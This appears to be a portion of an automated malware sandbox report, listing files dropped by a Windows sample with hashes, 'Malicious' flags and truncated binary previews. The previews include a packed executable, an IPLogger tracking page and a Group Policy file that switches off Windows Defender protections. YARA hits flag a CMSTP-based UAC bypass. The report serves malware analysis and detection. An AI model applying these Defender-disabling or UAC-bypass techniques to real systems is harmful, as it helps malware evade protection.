                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...3.;f.........."....'.............D.........@.....................................!j... .........................................................0..d.......................................................(................................................... .........T&..................... ..... .......X&..................rsrc...d....0.......`&.............@....idata...............(.............@....tls..................(..................themida..A......A...(.............`...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6892232
                                                      Entropy (8bit):7.996333388958455
                                                      Encrypted:true
                                                      SSDEEP:196608:91OSMJdJiB9rrezjknd2evIO726Kc0ODm2ysYg3rG:3OSA8wYvt2vc0OnyA3rG
                                                      MD5:53D14BD638C98C210E391151A8D3BCCC
                                                      SHA1:B3521F13E3C43295DFA291D5B047372DDC3C1A8B
                                                      SHA-256:1FB6D951265C037103AA2165A5CBF19961FD3EF1FF8017E461682B6666CE3898
                                                      SHA-512:0C02D70EB04C5618CCF9AC500BEC427CBCD3A26E54567535C0B4B19C8D3AB6B04C8EE893A3E0DA7861CFCA0C652B330AC682F8EAE091B225F2A824723BC5B568
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                      Category:dropped
                                                      Size (bytes):6923264
                                                      Entropy (8bit):7.247307521328743
                                                      Encrypted:false
                                                      SSDEEP:49152:/d84kqSab6V599+xS6Zokh5QK4SbHo/xak/tMw1NxcwCr4RCmUUdr5snBK0PSGUh:/G4kwGb948Aok/+OwVRcwksVsnkL7
                                                      MD5:F0587649682207064554A2372966435D
                                                      SHA1:2E8B948DFCFFCEB8ACF550A585D2EA127F28F41F
                                                      SHA-256:6BD479DD9293043D4149641897629169DF609ADF72926D32ADFE0094C583828E
                                                      SHA-512:F5D683B9F71F5F3647D0592F801C02F1DCEA7EB49B16FA2E481487D0ABC1770610DC9182148A68F749B19950FC3B122911AE0FD1B167CE5DDE31931A14B45FDD
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...3.;f.........."....'.............D.........@.....................................!j... .........................................................0..d.......................................................(................................................... .........T&..................... ..... .......X&..................rsrc...d....0.......`&.............@....idata...............(.............@....tls..................(..................themida..A......A...(.............`...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6892232
                                                      Entropy (8bit):7.996333388958455
                                                      Encrypted:true
                                                      SSDEEP:196608:91OSMJdJiB9rrezjknd2evIO726Kc0ODm2ysYg3rG:3OSA8wYvt2vc0OnyA3rG
                                                      MD5:53D14BD638C98C210E391151A8D3BCCC
                                                      SHA1:B3521F13E3C43295DFA291D5B047372DDC3C1A8B
                                                      SHA-256:1FB6D951265C037103AA2165A5CBF19961FD3EF1FF8017E461682B6666CE3898
                                                      SHA-512:0C02D70EB04C5618CCF9AC500BEC427CBCD3A26E54567535C0B4B19C8D3AB6B04C8EE893A3E0DA7861CFCA0C652B330AC682F8EAE091B225F2A824723BC5B568
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6892232
                                                      Entropy (8bit):7.996333388958455
                                                      Encrypted:true
                                                      SSDEEP:196608:91OSMJdJiB9rrezjknd2evIO726Kc0ODm2ysYg3rG:3OSA8wYvt2vc0OnyA3rG
                                                      MD5:53D14BD638C98C210E391151A8D3BCCC
                                                      SHA1:B3521F13E3C43295DFA291D5B047372DDC3C1A8B
                                                      SHA-256:1FB6D951265C037103AA2165A5CBF19961FD3EF1FF8017E461682B6666CE3898
                                                      SHA-512:0C02D70EB04C5618CCF9AC500BEC427CBCD3A26E54567535C0B4B19C8D3AB6B04C8EE893A3E0DA7861CFCA0C652B330AC682F8EAE091B225F2A824723BC5B568
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                      Category:dropped
                                                      Size (bytes):7462
                                                      Entropy (8bit):5.420482116403958
                                                      Encrypted:false
                                                      SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                                                      MD5:77F762F953163D7639DFF697104E1470
                                                      SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                                                      SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                                                      SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6892232
                                                      Entropy (8bit):7.996333388958455
                                                      Encrypted:true
                                                      SSDEEP:196608:91OSMJdJiB9rrezjknd2evIO726Kc0ODm2ysYg3rG:3OSA8wYvt2vc0OnyA3rG
                                                      MD5:53D14BD638C98C210E391151A8D3BCCC
                                                      SHA1:B3521F13E3C43295DFA291D5B047372DDC3C1A8B
                                                      SHA-256:1FB6D951265C037103AA2165A5CBF19961FD3EF1FF8017E461682B6666CE3898
                                                      SHA-512:0C02D70EB04C5618CCF9AC500BEC427CBCD3A26E54567535C0B4B19C8D3AB6B04C8EE893A3E0DA7861CFCA0C652B330AC682F8EAE091B225F2A824723BC5B568
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                      Category:dropped
                                                      Size (bytes):6923264
                                                      Entropy (8bit):7.247307521328743
                                                      Encrypted:false
                                                      SSDEEP:49152:/d84kqSab6V599+xS6Zokh5QK4SbHo/xak/tMw1NxcwCr4RCmUUdr5snBK0PSGUh:/G4kwGb948Aok/+OwVRcwksVsnkL7
                                                      MD5:F0587649682207064554A2372966435D
                                                      SHA1:2E8B948DFCFFCEB8ACF550A585D2EA127F28F41F
                                                      SHA-256:6BD479DD9293043D4149641897629169DF609ADF72926D32ADFE0094C583828E
                                                      SHA-512:F5D683B9F71F5F3647D0592F801C02F1DCEA7EB49B16FA2E481487D0ABC1770610DC9182148A68F749B19950FC3B122911AE0FD1B167CE5DDE31931A14B45FDD
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...3.;f.........."....'.............D.........@.....................................!j... .........................................................0..d.......................................................(................................................... .........T&..................... ..... .......X&..................rsrc...d....0.......`&.............@....idata...............(.............@....tls..................(..................themida..A......A...(.............`...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                      Category:dropped
                                                      Size (bytes):7462
                                                      Entropy (8bit):5.420482116403958
                                                      Encrypted:false
                                                      SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                                                      MD5:77F762F953163D7639DFF697104E1470
                                                      SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                                                      SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                                                      SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                      Category:dropped
                                                      Size (bytes):7462
                                                      Entropy (8bit):5.420482116403958
                                                      Encrypted:false
                                                      SSDEEP:192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
                                                      MD5:77F762F953163D7639DFF697104E1470
                                                      SHA1:ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
                                                      SHA-256:D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
                                                      SHA-512:D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):223744
                                                      Entropy (8bit):6.935500931385667
                                                      Encrypted:false
                                                      SSDEEP:3072:Kuznf8GvOGOqHDT6C3q+OElN2SeYgzOdZRJZlb3asijEq95mdBbx1ldvhqy:Hf8COqjmC64eYgzOJZlWsi19YdX1ld
                                                      MD5:C5A6381354CD5D1488E362C9103C1851
                                                      SHA1:3D87BC60F2C8A74BCD0295AF4EDF02D9486BE3B5
                                                      SHA-256:B69CF7AEC22182A247D52D76C200A78128CCCAFA246DEDAFC8898824DB7424F9
                                                      SHA-512:2C22149B37041AE844F3A12459C8A7EA837B1F62E0F54D4C9FC188D823433B92497AB697F841C05D958A758A9A2B69AC0DDB779659B19721FEED54B4C5736CE7
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...............................................N.............N......Rich............................PE..L.....Md.....................N.......>............@..........................`.......d.......................................i..P...................................i..............................@_..@...............d............................text.../........................... ..`.rdata...q.......r..................@..@.data...`1.......x...\..............@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                      Category:dropped
                                                      Size (bytes):6923264
                                                      Entropy (8bit):7.247307521328743
                                                      Encrypted:false
                                                      SSDEEP:49152:/d84kqSab6V599+xS6Zokh5QK4SbHo/xak/tMw1NxcwCr4RCmUUdr5snBK0PSGUh:/G4kwGb948Aok/+OwVRcwksVsnkL7
                                                      MD5:F0587649682207064554A2372966435D
                                                      SHA1:2E8B948DFCFFCEB8ACF550A585D2EA127F28F41F
                                                      SHA-256:6BD479DD9293043D4149641897629169DF609ADF72926D32ADFE0094C583828E
                                                      SHA-512:F5D683B9F71F5F3647D0592F801C02F1DCEA7EB49B16FA2E481487D0ABC1770610DC9182148A68F749B19950FC3B122911AE0FD1B167CE5DDE31931A14B45FDD
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...3.;f.........."....'.............D.........@.....................................!j... .........................................................0..d.......................................................(................................................... .........T&..................... ..... .......X&..................rsrc...d....0.......`&.............@....idata...............(.............@....tls..................(..................themida..A......A...(.............`...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1524456
                                                      Entropy (8bit):6.801769891654878
                                                      Encrypted:false
                                                      SSDEEP:24576:3D1YS7FpyUxT3DC2C1zj1SqdAGFQZIx2C45UJoeXH:OQ5xT3DDazjYq+ZIwL5UJoe3
                                                      MD5:CD4ACEDEFA9AB5C7DCCAC667F91CEF13
                                                      SHA1:BFF5CE910F75AEAE37583A63828A00AE5F02C4E7
                                                      SHA-256:DD0E8944471F44180DD44807D817E0B8A1C931FC67D48278CDB7354D98567E7C
                                                      SHA-512:06FAE66DA503EB1B9B4FBE63A5BB98C519A43999060029C35FE289E60B1CB126A6278C67CE90F02E05B893FCAEA6D54F9DEB65BC6DA82561487A7754F50C93D1
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........:..i..i..iM..i..i...i..i...iY.i...i..i..i..i...i..i...i..i..iB.i...i..i..i..i...i..iRich..i................PE..L......a.............................<............@..................................$.......................................Y..(.... ..`V..............P,..........@..................................@...............`...pD..@....................text............................... ..`.rdata...V.......X..................@..@.data...@....p...h...T..............@....rsrc...`V... ...X..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1524456
                                                      Entropy (8bit):6.801769891654878
                                                      Encrypted:false
                                                      SSDEEP:24576:3D1YS7FpyUxT3DC2C1zj1SqdAGFQZIx2C45UJoeXH:OQ5xT3DDazjYq+ZIwL5UJoe3
                                                      MD5:CD4ACEDEFA9AB5C7DCCAC667F91CEF13
                                                      SHA1:BFF5CE910F75AEAE37583A63828A00AE5F02C4E7
                                                      SHA-256:DD0E8944471F44180DD44807D817E0B8A1C931FC67D48278CDB7354D98567E7C
                                                      SHA-512:06FAE66DA503EB1B9B4FBE63A5BB98C519A43999060029C35FE289E60B1CB126A6278C67CE90F02E05B893FCAEA6D54F9DEB65BC6DA82561487A7754F50C93D1
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........:..i..i..iM..i..i...i..i...iY.i...i..i..i..i...i..i...i..i..iB.i...i..i..i..i...i..iRich..i................PE..L......a.............................<............@..................................$.......................................Y..(.... ..`V..............P,..........@..................................@...............`...pD..@....................text............................... ..`.rdata...V.......X..................@..@.data...@....p...h...T..............@....rsrc...`V... ...X..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                      Category:dropped
                                                      Size (bytes):6923264
                                                      Entropy (8bit):7.247307521328743
                                                      Encrypted:false
                                                      SSDEEP:49152:/d84kqSab6V599+xS6Zokh5QK4SbHo/xak/tMw1NxcwCr4RCmUUdr5snBK0PSGUh:/G4kwGb948Aok/+OwVRcwksVsnkL7
                                                      MD5:F0587649682207064554A2372966435D
                                                      SHA1:2E8B948DFCFFCEB8ACF550A585D2EA127F28F41F
                                                      SHA-256:6BD479DD9293043D4149641897629169DF609ADF72926D32ADFE0094C583828E
                                                      SHA-512:F5D683B9F71F5F3647D0592F801C02F1DCEA7EB49B16FA2E481487D0ABC1770610DC9182148A68F749B19950FC3B122911AE0FD1B167CE5DDE31931A14B45FDD
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...3.;f.........."....'.............D.........@.....................................!j... .........................................................0..d.......................................................(................................................... .........T&..................... ..... .......X&..................rsrc...d....0.......`&.............@....idata...............(.............@....tls..................(..................themida..A......A...(.............`...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\lgX7lgUL1w.exe
                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1843424
                                                      Entropy (8bit):6.796482233204677
                                                      Encrypted:false
                                                      SSDEEP:24576:jynjN3fi9dEoZR814OEQjls30eTFxmT4i8eMOq52eOXuq01dKqOF7:ujN3CdJ81nEQhs30eWuqsrOF7
                                                      MD5:7FF8C26A36F5A4566990745DFF1594F3
                                                      SHA1:5D73BBD168FB9B1E43051340A415D95F28C40F4D
                                                      SHA-256:FC44A0E8161907E73F2E7F0EE5B264A8E2C78F5AF3437C4CB25341661DA8D813
                                                      SHA-512:D97BE45D80E85722E74B44AEFF834B2CCC219520C7D1632452C4A361B9DEA59439F0F0BA27AF6444132147C7BC30CCD5582BB0A0E246BAF00F61E16195706B2D
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\lgX7lgUL1w.exe, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD, Description: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF, Source: C:\Users\user\lgX7lgUL1w.exe, Author: ditekSHen
                                                      Reputation:unknown
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6c.IW._IW._IW._O..^EW._O..^XW._O..^gW._@/._GW._./.^BW._IW._IV._.+.^BW._.+.^.W._IW._KW._#..^HW._#.._HW._#..^HW._RichIW._........................PE..d...vsNf.........."....&.....V......\..........@............................. ".....?.....`..........................................y..X....y........!.`1.... .L1............".4...p...........................(...0...@...............x............................text............................... ..`.managedh....0....... .............. ..`hydrated.................................rdata..............................@..@.data............"...x..............@....pdata..L1.... ..2..................@..@_RDATA........!.....................@..@.rsrc...`1....!..2..................@..@.reloc..4.....".....................@..B........................................................................................................
                                                      Process:C:\Users\user\Desktop\lgX7lgUL1w.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:RAGE Package Format (RPF),
                                                      Category:dropped
                                                      Size (bytes):1926
                                                      Entropy (8bit):3.310422749310586
                                                      Encrypted:false
                                                      SSDEEP:24:wSLevFeSLe5BeSwbv5qweSw4q7j/eScdepWDbVeScden2W8eScdemevtmeScdeRg:KFIBkbv5qwk4qfKV2QxVCZ
                                                      MD5:CDFD60E717A44C2349B553E011958B85
                                                      SHA1:431136102A6FB52A00E416964D4C27089155F73B
                                                      SHA-256:0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F
                                                      SHA-512:DFEA0D0B3779059E64088EA9A13CD6B076D76C64DB99FA82E6612386CAE5CDA94A790318207470045EF51F0A410B400726BA28CB6ECB6972F081C532E558D6A8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.
                                                      Process:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):127
                                                      Entropy (8bit):5.080093624462795
                                                      Encrypted:false
                                                      SSDEEP:3:1ELGUAgKLMzY+eWgTckbnnvjiBIFVTjSUgf4orFLsUov:1WsMzYHxbnvEcvgqv
                                                      MD5:8EF9853D1881C5FE4D681BFB31282A01
                                                      SHA1:A05609065520E4B4E553784C566430AD9736F19F
                                                      SHA-256:9228F13D82C3DC96B957769F6081E5BAC53CFFCA4FFDE0BA1E102D9968F184A2
                                                      SHA-512:5DDEE931A08CFEA5BB9D1C36355D47155A24D617C2A11D08364FFC54E593064011DEE4FEA8AC5B67029CAB515D3071F0BA0422BB76AF492A3115272BA8FEB005
                                                      Malicious:true
                                                      Reputation:unknown
                                                      Preview:[General]..gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]..Version=1..
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):338
                                                      Entropy (8bit):3.4679554894199565
                                                      Encrypted:false
                                                      SSDEEP:6:kKAD8wcEJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:S6kPlE99SCQl2DUevat
                                                      MD5:365A44296A5098D747D10E2A01C9E634
                                                      SHA1:B6B232D785F871E6B1DD92EEB74C842B7441D0E3
                                                      SHA-256:253F4BCC6E416C65F179AB8A43EB1C0E64E08EDAB805EF431341482512811FE6
                                                      SHA-512:6D196354E03118CFE96E92CF047E54A9738E1D12F9A1ABE511F44006A1F88FA59D004BEA1F753B9A01913DC002CBF79902852522D24B3621CCF8EB49B0CF6668
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:p...... .........'.....(.................................................;).... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                      Process:C:\Windows\SysWOW64\schtasks.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):458
                                                      Entropy (8bit):3.625991027029207
                                                      Encrypted:false
                                                      SSDEEP:12:fbBJJQ1b7IWGdHAAzioA8KJQ1b7PkXd8kX+Vas:fb7uNMHAPOKuNPd
                                                      MD5:F3FA57FCB11D4A93EC6338AB3883361C
                                                      SHA1:BE27093F2A5E937C376B401ABA879854DD8BFFC6
                                                      SHA-256:7EFDC49642B1C2266F54A8498541856A44BF2FD5C8E27D9AA4DCDBCB91853C82
                                                      SHA-512:2071D6B937C1D340451E704DB1AF08C6B4BC876F972332EF0D9EF391259B23D41659265AE60F4FA9540B16B196D70F8F2C61CF9829B01B9D13102AA6FCF185D1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.....).c.,HH.<.8...F.......<... .....s...............................=.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.7.z.S.A.0.5.C...t.m.p.\.I.n.s.t.a.l.l...e.x.e.....i.t. ./.f.M.D.d.i.d.l.B.g.f. .3.8.5.1.1.8. ./.S...1.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.7.z.S.A.0.5.C...t.m.p.....F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...............................................
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.41397219602002
                                                      Encrypted:false
